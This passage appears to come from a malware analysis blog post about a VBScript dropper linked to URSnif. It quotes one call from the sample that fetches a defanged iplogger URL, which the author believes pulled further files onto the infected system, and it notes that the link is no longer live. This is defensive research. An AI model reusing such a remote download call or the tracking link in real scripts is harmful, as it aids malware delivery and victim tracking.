There are several lines in this VBScript where this function is called to download the following URL:

principal("https://iplogger[.]org/1bP467")

My assumption here is that the attacker used this URL shortener service to download additional files to the affected system. However, the link is no longer valid.

Other than that, there are some other functions in the VBScript file, but they are less interesting. In addition, I didn't include any information about the URSnif variant because there are plenty of blog posts out there that dissect this variant quite beautifully.
